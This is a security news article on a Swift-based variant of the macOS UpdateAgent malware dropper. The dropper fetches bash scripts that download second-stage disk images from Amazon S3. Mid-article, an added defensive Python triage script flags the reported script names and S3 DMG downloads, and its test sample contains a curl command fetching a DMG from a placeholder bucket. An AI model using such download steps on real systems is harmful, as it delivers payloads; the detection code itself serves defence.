The Cyber Security News

UpdateAgent Returns with New macOS Malware Dropper Written in Swift

May 17, 2022

A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionality.

“Probably one of the most identifiable functions of the malware is that it relies on the AWS infrastructure to host its different payloads and complete its infection status updates to the server,” researchers from Jamf Threat Labs said in a report.

UpdateAgent, initially detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.


The recently identified Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.

“The principal change [between the two executables] is that it reaches out to a distinct URL from which it must load a bash script,” the researchers said.

These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh”, contain a URL pointing to Amazon S3 buckets, which is used to download and run a second-stage disk image (DMG) file on the compromised endpoint.
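For defenders triaging shell scripts collected from an endpoint, the traits described above (the reported script names and an Amazon S3 URL that resolves to a DMG) can be checked mechanically. The following is an added example, not code from Jamf or from the original article; the function names, the tag strings, the `bash_<letters>.sh` pattern and the sample inputs with placeholder bucket names are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Script names reported in the article. The bash_<letters>.sh pattern is an
# assumption that generalises the single reported name "bash_qolveevgclr.sh".
KNOWN_NAMES = {"activedirec.sh", "bash_qolveevgclr.sh"}
RANDOM_NAME = re.compile(r"^bash_[a-z]{6,}\.sh$")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def is_s3_host(host):
    """True for virtual-hosted and path-style Amazon S3 endpoints."""
    if not host.endswith(".amazonaws.com"):
        return False
    return any(l == "s3" or l.startswith("s3-") for l in host.split("."))


def triage_script(name, text):
    """Return a sorted list of indicator tags for one shell script."""
    tags = set()
    base = name.rsplit("/", 1)[-1].lower()
    if base in KNOWN_NAMES:
        tags.add("reported-filename")
    elif RANDOM_NAME.match(base):
        tags.add("filename-pattern")
    for url in URL_RE.findall(text):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if is_s3_host(host):
            tags.add("s3-url")
            # The query string (e.g. a presigned URL) is not part of .path.
            if parsed.path.lower().endswith(".dmg"):
                tags.add("s3-dmg-download")
    return sorted(tags)


# Constructed samples; bucket and host names are placeholders.
SUSPECT = ('#!/bin/bash\n'
           'curl -s -o /tmp/x.dmg '
           '"https://example-bucket.s3.amazonaws.com/stage2.dmg"\n')
BENIGN = '#!/bin/bash\ncurl -O https://example.com/tool.dmg\n'

if __name__ == "__main__":
    print(triage_script("/tmp/activedirec.sh", SUSPECT))
    print(triage_script("install.sh", BENIGN))
```

A filename match alone is weak evidence, since names are trivial to change; the combination of an S3-hosted DMG download inside a script dropped by an unsigned or unexpected binary is the more useful signal.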

“The ongoing development of this malware shows that its authors continue to be active, trying to reach as many users as possible,” the researchers stated.



Some parts of this article are sourced from:
thehackernews.com
